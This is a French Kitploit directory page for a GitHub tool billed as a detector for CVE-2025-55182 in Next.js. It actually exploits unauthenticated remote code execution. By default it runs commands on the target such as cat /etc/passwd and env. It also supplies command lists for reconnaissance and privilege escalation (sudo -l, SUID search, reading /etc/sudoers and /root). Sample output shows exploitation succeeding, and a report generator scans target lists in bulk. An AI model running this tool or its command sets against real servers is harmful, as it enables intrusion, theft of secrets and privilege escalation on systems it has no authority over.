Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Components. | Kitploit
Outils/GitHubGitHub/rix4uni/cve-2025-55182
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and Control
GitHubrix4uni/cve-2025-55182

CVE-2025-55182

A command-line tool for detecting CVE-2025-55182 and CVE-2025-66478 in Next.js applications using React Server Components.

Voir le dépôt
61il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182

Un outil en ligne de commande pour détecter CVE-2025-55182 et CVE-2025-66478 dans les applications Next.js utilisant React Server Components.

🚀 Installation

root@kitploit:~
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator

🛠️ Utilisation

Scanner CVE-2025-55182

Syntaxe de base

root@kitploit:~
CVE-2025-55182 -d https://example.com

Options

Remarque : Si aucune option de commande n'est fournie, les commandes par défaut sont exécutées.

Commandes par défaut

L'outil exécute ces commandes par défaut :

  1. cat /etc/os-release - Informations sur le système d'exploitation
  2. whoami - Utilisateur actuel
  3. pwd - Répertoire de travail actuel
  4. id - ID utilisateur et groupes
  5. uname -a - Informations système
  6. hostname -I - Interfaces réseau
  7. ls -la - Liste des répertoires
  8. cat /etc/passwd - Comptes utilisateurs
  9. env - Variables d'environnement
  10. ps aux - Processus en cours

Générateur de rapports

L'outil reportgenerator génère automatiquement des rapports professionnels de divulgation de vulnérabilités à partir des résultats de scan.

Fonctionnalités

  • Scan parallèle de plusieurs cibles
  • Numérotation automatique qui préserve les rapports existants (pas d'écrasement)
  • Rapports professionnels en markdown avec section « Divulgation de vulnérabilité de sécurité »
  • Nom du chercheur personnalisable et fichier d'entrée

Utilisation de base

root@kitploit:~
# Créez un fichier avec les domaines cibles
echo -e "https://cible1.com\nhttps://cible2.com" > subs.txt

# Exécutez le générateur de rapports
reportgenerator

Options

OptionDescriptionDéfaut
--fileFichier d'entrée contenant les domaines ciblessubs.txt
--userNom du chercheur pour la section de divulgationBhagirath Saxena

Exemples

root@kitploit:~
# Utilisation des paramètres par défaut (subs.txt, Bhagirath Saxena)
reportgenerator

# Utilisation d'un fichier cible personnalisé
reportgenerator --file cibles.txt

# Utilisation d'un nom de chercheur personnalisé
reportgenerator --user "John Doe"

# Utilisation des deux options personnalisées
reportgenerator --file mes-cibles.txt --user "Jane Smith"

Structure de sortie

Les rapports sont générés dans deux répertoires :

  • textfile/ - Résultats bruts du scan (numérotés : 1.txt, 2.txt, etc.)
  • mdfile/ - Rapports professionnels en markdown (numérotés : 1.md, 2.md, etc.)

Remarque : La fonction de numérotation automatique garantit que les rapports existants ne sont jamais écrasés. Les nouveaux scans reprennent à partir du numéro le plus élevé existant.

Format du rapport

Chaque rapport généré comprend :

  1. Divulgation de vulnérabilité de sécurité - Lettre d'introduction professionnelle
  2. Cible - Le domaine testé
  3. Commandes exécutées - Liste des commandes exécutées lors du test
  4. Résumé de la vulnérabilité - Détails du CVE et évaluation de l'impact
  5. Détails d'exploitation - Résultats des commandes avec statut d'exécution
  6. Récapitulatif d'exécution - Tableau montrant le succès/échec de chaque commande
  7. Analyse d'impact - Évaluation de la gravité et observations
  8. Recommandations - Étapes de correction pour l'équipe de sécurité
  9. Références - Liens vers les détails du CVE et les avis de sécurité

🎨 Exemples de sortie

Exploitation réussie

root@kitploit:~
▼ 🎯 CIBLE : https://application-vulnerable.com
▼ 📋 COMMANDES À EXÉCUTER : 10
  • cat /etc/os-release
  • whoami
  • pwd
  • id
  • uname -a
  • hostname -I
  • ls -la
  • cat /etc/passwd
  • env
  • ps aux

[1/10] Exécution de : cat /etc/os-release
▼ 💻 INFORMATIONS SYSTÈME
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...

[2/10] Exécution de : whoami
▼ 👤 UTILISATEUR ACTUEL
║ www-data
...

[3/10] Exécution de : pwd
▼ 📂 RÉPERTOIRE ACTUEL
║ /var/www/html
...

Succès partiel

root@kitploit:~
[6/10] Exécution de : hostname -I
╔════════════════════════════════════════════════════════════╗
║ Échec de la commande : hostname -I
║ Cette commande n'est peut-être pas disponible ou le serveur l'a rejetée
╚════════════════════════════════════════════════════════════╝

[!] Tentative de commande réseau alternative...
▼ 🌐 INTERFACES RÉSEAU (alternative)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║     inet 127.0.0.1/8 scope host lo
║        valid_lft forever preferred_lft forever
...

🔧 Détails techniques

Vulnérabilité

  • CVE : CVE-2025-55182
  • Type : Pollution de prototype → RCE
  • Concerne : Applications Next.js avec configurations spécifiques
  • Vecteur : HTTP POST avec multipart/form-data modifié
  • Impact : Exécution de code à distance non authentifiée en tant qu'utilisateur de l'application

📚 Références

  • Détails de CVE-2025-55182
  • Avis de sécurité Next.js

Exemples de répertoire commands/ :

Créez des fichiers de commandes d'exemple pour différents scénarios :

root@kitploit:~
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
root@kitploit:~
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
root@kitploit:~
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/
Télécharger l’outil
OptionDescriptionDéfaut
-d, --domainURL cible (ajoute automatiquement https:// si aucun protocole)http://localhost:3000
-c, --commandCommande unique à exécuter-
-m, --multipleCommandes multiples séparées par des points-virgules-
-f, --fileFichier contenant les commandes (une par ligne)-
-h, --helpAfficher le message d'aide-